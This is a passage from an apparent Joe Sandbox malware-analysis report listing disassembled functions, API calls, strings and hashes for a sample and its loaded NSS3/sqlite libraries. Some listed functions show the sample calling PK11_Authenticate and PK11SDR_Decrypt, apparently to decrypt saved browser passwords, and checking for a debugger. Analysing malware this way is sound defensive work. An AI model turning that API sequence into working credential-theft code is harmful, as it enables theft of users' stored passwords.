                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CB7112E
                                                                                            • Part of subcall function 6CB71570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CB708C4,?,?), ref: 6CB715B8
                                                                                            • Part of subcall function 6CB71570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CB708C4,?,?), ref: 6CB715C1
                                                                                            • Part of subcall function 6CB71570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB7162E
                                                                                            • Part of subcall function 6CB71570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB71637
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                          • String ID:
                                                                                          • API String ID: 1510409361-0
                                                                                          • Opcode ID: bb334de6a57bd016143a8198d0bc4214585c5f39f665ccbaf08a937690dfcbd1
                                                                                          • Instruction ID: a40187d2c257ac8444bd1e1d54fecbf9d303a0c55e3a1d2ff054b122d0ace1d9
                                                                                          • Opcode Fuzzy Hash: bb334de6a57bd016143a8198d0bc4214585c5f39f665ccbaf08a937690dfcbd1
                                                                                          • Instruction Fuzzy Hash: CF71E3B1A002858FDB10CFA5DC94A6EB7B4FF44318F18862DE92D9BB11E731D954CBA1
                                                                                          Function 0040C660 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040C693
                                                                                          • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00816BA0), ref: 0040C6B1
                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C6BC
                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 0040C6CA
                                                                                          • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C6E5
                                                                                          • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C72B
                                                                                          • memcpy.MSVCRT ref: 0040C752
                                                                                          • lstrcat.KERNEL32(?,00420B2E), ref: 0040C783
                                                                                          • lstrcat.KERNEL32(?,00420B2F), ref: 0040C797
                                                                                          • PK11_FreeSlot.NSS3(?), ref: 0040C7A1
                                                                                          • lstrcat.KERNEL32(?,00420B33), ref: 0040C7B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 3428224297-0
                                                                                          • Opcode ID: cbad7c0847f5c4f1099e9d5384a001de016509e2d4f22c5d3e1b4949098894a2
                                                                                          • Instruction ID: c0f5229a5aee9ff77f702815419eeee9532eb5a68af55b4089f36d1ae8d19eeb
                                                                                          • Opcode Fuzzy Hash: cbad7c0847f5c4f1099e9d5384a001de016509e2d4f22c5d3e1b4949098894a2
                                                                                          • Instruction Fuzzy Hash: 96414E7490421ADFCB20CFA4DD89BEEBBB9AB48304F1042B9F509A7280D7745A85CF95
                                                                                          Function 6CB96C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB41C6F,00000000,00000004,?,?), ref: 6CB96C3F
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB41C6F,00000000,00000004,?,?), ref: 6CB96C60
                                                                                          • PR_ExplodeTime.NSS3(00000000,6CB41C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB41C6F,00000000,00000004,?,?), ref: 6CB96C94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                          • API String ID: 3534712800-180463219
                                                                                          • Opcode ID: af01831cf1adf073fd3f89147ebe6e7dc384d61f9f33f9353a5e336e61d68b60
                                                                                          • Instruction ID: bac2bbfaa643978dcafde429f8b1391565dcc2667653b72b659acbb3a7856426
                                                                                          • Opcode Fuzzy Hash: af01831cf1adf073fd3f89147ebe6e7dc384d61f9f33f9353a5e336e61d68b60
                                                                                          • Instruction Fuzzy Hash: C4513A72B016494FC718CDADDC526DEBBEAEBA5310F48C23AE842DB781D638D906C751
                                                                                          Function 6CC18FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC18FEE
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC190DC
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC19118
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC1915C
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC191C2
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC19209
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: 3333$UUUU
                                                                                          • API String ID: 1967222509-2679824526
                                                                                          • Opcode ID: d6ad541506fba809edb89fa423c9d780afcdb8dae6e20ff97561ad7206fd5625
                                                                                          • Instruction ID: 8ead6a77dd0ddd7017ffebe1ab8fa3f292216931281227501ddeb8f10f7dd7ec
                                                                                          • Opcode Fuzzy Hash: d6ad541506fba809edb89fa423c9d780afcdb8dae6e20ff97561ad7206fd5625
                                                                                          • Instruction Fuzzy Hash: EDA1AF72E001159FDB04CB69CC90B9EB7B5BF88324F194179E90AA7741E736EC12CBA0
                                                                                          Function 6CAD0FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CACCA30: EnterCriticalSection.KERNEL32(?,?,?,6CB2F9C9,?,6CB2F4DA,6CB2F9C9,?,?,6CAF369A), ref: 6CACCA7A
                                                                                            • Part of subcall function 6CACCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CACCB26
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CAD103E
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CAD1139
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6CAD1190
                                                                                          • sqlite3_free.NSS3(00000000), ref: 6CAD1227
                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CAD126E
                                                                                          • sqlite3_free.NSS3(?), ref: 6CAD127F
                                                                                          Strings
                                                                                          • delayed %dms for lock/sharing conflict at line %d, xrefs: 6CAD1267
                                                                                          • winAccess, xrefs: 6CAD129B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                          • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                          • API String ID: 2733752649-1873940834
                                                                                          • Opcode ID: 16f9e8e025c795dbb0c894332a197126159efeeacbc47d086e50392e28c9dbee
                                                                                          • Instruction ID: 22dc6494203cceab6250fca625c63113b98591c880563834f2ca2b172d3c9ad5
                                                                                          • Opcode Fuzzy Hash: 16f9e8e025c795dbb0c894332a197126159efeeacbc47d086e50392e28c9dbee
                                                                                          • Instruction Fuzzy Hash: 91711D317042119BEB04DF65EC89A7E3375FB86334F19022DFA1687A80DB31E986C792
                                                                                          Function 6CADAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CBFCF46,?,6CACCDBD,?,6CBFBF31,?,?,?,?,?,?,?), ref: 6CADB039
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CBFCF46,?,6CACCDBD,?,6CBFBF31), ref: 6CADB090
                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6CBFCF46,?,6CACCDBD,?,6CBFBF31), ref: 6CADB0A2
                                                                                          • CloseHandle.KERNEL32(?,?,6CBFCF46,?,6CACCDBD,?,6CBFBF31,?,?,?,?,?,?,?,?,?), ref: 6CADB100
                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6CBFCF46,?,6CACCDBD,?,6CBFBF31,?,?,?,?,?,?,?), ref: 6CADB115
                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6CBFCF46,?,6CACCDBD,?,6CBFBF31), ref: 6CADB12D
                                                                                            • Part of subcall function 6CAC9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CADC6FD,?,?,?,?,6CB2F965,00000000), ref: 6CAC9F0E
                                                                                            • Part of subcall function 6CAC9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB2F965,00000000), ref: 6CAC9F5D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3155957115-0
                                                                                          • Opcode ID: ac4def5de0985c50085952763f0c36c5107c575f6b9bd87da6bfca751d3b08e9
                                                                                          • Instruction ID: 20188b2a5cd88bfd3e586ba00f408dbaa9dba849a6c5765cda181e2fb93bb26f
                                                                                          • Opcode Fuzzy Hash: ac4def5de0985c50085952763f0c36c5107c575f6b9bd87da6bfca751d3b08e9
                                                                                          • Instruction Fuzzy Hash: 8091DFB0A04205CFDB04CF69D984A6BB7B2FF49308F19462DE41697A50EB31F985CB52
                                                                                          Function 6CC58D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_CallOnce.NSS3(6CCA14E4,6CC0CC70), ref: 6CC58D47
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CC58D98
                                                                                            • Part of subcall function 6CB30F00: PR_GetPageSize.NSS3(6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000,?,6CAC204A), ref: 6CB30F1B
                                                                                            • Part of subcall function 6CB30F00: PR_NewLogModule.NSS3(clock,6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000,?,6CAC204A), ref: 6CB30F25
                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CC58E7B
                                                                                          • htons.WSOCK32(?), ref: 6CC58EDB
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CC58F99
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CC5910A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                          • String ID: %u.%u.%u.%u
                                                                                          • API String ID: 1845059423-1542503432
                                                                                          • Opcode ID: c91cf3ff8cc041b4fedd4a47af8330bef98121d4efe652e52acee7e51f9a1fce
                                                                                          • Instruction ID: 7aa06908f8faaca39295150bf3fd290ac0be44f6cdb3cb85bf6be20cabc8f71a
                                                                                          • Opcode Fuzzy Hash: c91cf3ff8cc041b4fedd4a47af8330bef98121d4efe652e52acee7e51f9a1fce
                                                                                          • Instruction Fuzzy Hash: 3B02DE31A061618FDB14CF19C45876BBBB3EF42304F99829EC8519FA91E331D976C794
                                                                                          Function 6CADEFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                          • API String ID: 3168844106-1126224928
                                                                                          • Opcode ID: 348400a1d3fe41b681c160d98673236254eacf592cb188ea26242b40fc06a99c
                                                                                          • Instruction ID: 57949ee8277254d7daf9d3f8c54cd1a101dd9eb90638a3c3c8aabb728bebdddf
                                                                                          • Opcode Fuzzy Hash: 348400a1d3fe41b681c160d98673236254eacf592cb188ea26242b40fc06a99c
                                                                                          • Instruction Fuzzy Hash: 2F72A670E042458FDB14CF68C884B9ABBF1FF49308F1A81ADD9159B752D775E886CB90
                                                                                          Function 6CA2D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $-$0$0$1$8$9$@
                                                                                          • API String ID: 0-3654031807
                                                                                          • Opcode ID: 9d2c7b29d9f5aaba5c833bfa2c8a0948eda0344d4265e2dd50748e4f3b2000dd
                                                                                          • Instruction ID: 3985127d9ef2425e1de39ded8b4b1559de2096da7215fa8cdadb178b2275fbca
                                                                                          • Opcode Fuzzy Hash: 9d2c7b29d9f5aaba5c833bfa2c8a0948eda0344d4265e2dd50748e4f3b2000dd
                                                                                          • Instruction Fuzzy Hash: 7F62AD7190C3A58FD715CF29C09075ABBF2AF86358F1C4A1DE8D54BA92C37998C5CB82
                                                                                          Function 00409B10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
                                                                                          • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BinaryCryptLocalString$AllocFree
                                                                                          • String ID: >O@
                                                                                          • API String ID: 4291131564-3498640338
                                                                                          • Opcode ID: 51d6155b46c97a52efa385d52040a93a20dc9faff1265f51667d84e9c93c90dd
                                                                                          • Instruction ID: 421755d6b48e33095a5169d11db47f4caeee54bd02e7bdd1b67a963d2e3b7d6d
                                                                                          • Opcode Fuzzy Hash: 51d6155b46c97a52efa385d52040a93a20dc9faff1265f51667d84e9c93c90dd
                                                                                          • Instruction Fuzzy Hash: 7F11C074240308AFEB10CF64CC95FAA77B6FB89710F208059F9199B3D0C7B5A942CB54
                                                                                          Function 0041ACFA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0041B562
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
                                                                                          • UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 0041B5A5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 2579439406-0
                                                                                          • Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
                                                                                          • Instruction ID: e298f46f0b3396334d2e2e37c4a67069ca1d3d313a6b9180192500d6cd60c5fb
                                                                                          • Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
                                                                                          • Instruction Fuzzy Hash: 2F21D678600214DFD720EF59F9D4AA97BB5FB08314F90803AE809D7261E7B46586CF9D
                                                                                          Function 00407280 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0), ref: 0040728D
